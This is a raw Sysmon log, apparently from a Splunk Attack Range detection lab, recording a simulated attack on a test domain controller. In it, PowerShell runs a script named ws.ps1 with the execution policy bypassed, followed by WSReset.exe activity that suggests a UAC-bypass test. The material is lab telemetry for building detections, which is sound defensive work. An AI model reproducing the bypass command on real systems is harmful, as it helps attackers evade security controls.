08:04:22.974{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=7DF9D06FA3FF100C721D8101DF107116,SHA256=3B641FA376C4B9B9DD98A53E830FD4E11195277FBE6DE1AD5D8F765675C958B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:22.974{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.974{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001053291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.943{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnk2021-07-12 07:57:26.859 23542300x80000000000000001053290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.927{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\ws.ps1.lnkMD5=ABA8F98CBA8D706A046FE9CB332F9881,SHA256=719D5352ED434D3557CB96CCC5EF157E95A8C1460889671D808F297711D2B432,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:22.927{466BC892-F786-60EB-CB7D-00000000CF01}11848676C:\Windows\system32\conhost.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.890{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F786-60EB-CB7D-00000000CF01}1184C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.874{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:22.874{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.874{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:22.874{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.874{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:22.874{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001053281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.866{466BC892-F786-60EB-CA7D-00000000CF01}9508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 
'C:\Temp\test\ws.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001053280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.024{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=283F93CB067D7125381930C81E78BFB8,SHA256=493388FCA9A155E9E100D97883BE27FEE2E59633CCF28C139218A2DEB5F6A380,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809716Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:23.151{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAD091C326B9E006687119551E4638CF,SHA256=9C2FFE1567B433EBBCB6A7865AE2A0227A165C1FCD632ED8834D7F6EA8A67F29,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.965{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.965{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.965{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.950{466BC892-02AD-60E8-0A00-00000000CF01}6162696C:\Windows\system32\services.exe{466BC892-F787-60EB-CE7D-00000000CF01}9968C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.950{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F787-60EB-CE7D-00000000CF01}9968C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001053347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:14.766{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61921-false10.0.1.12-8000- 10341000x80000000000000001053346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.931{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F787-60EB-CE7D-00000000CF01}9968C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.930{466BC892-02AD-60E8-0A00-00000000CF01}6163760C:\Windows\system32\services.exe{466BC892-F787-60EB-CE7D-00000000CF01}9968C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.912{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.912{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.912{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.912{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.865{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F787-60EB-CD7D-00000000CF01}9664C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.865{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F787-60EB-CD7D-00000000CF01}9664C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.850{466BC892-F787-60EB-CD7D-00000000CF01}966410204C:\Windows\system32\conhost.exe{466BC892-F787-60EB-CC7D-00000000CF01}8652C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:23.850{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F787-60EB-CD7D-00000000CF01}9664C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:23.834{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
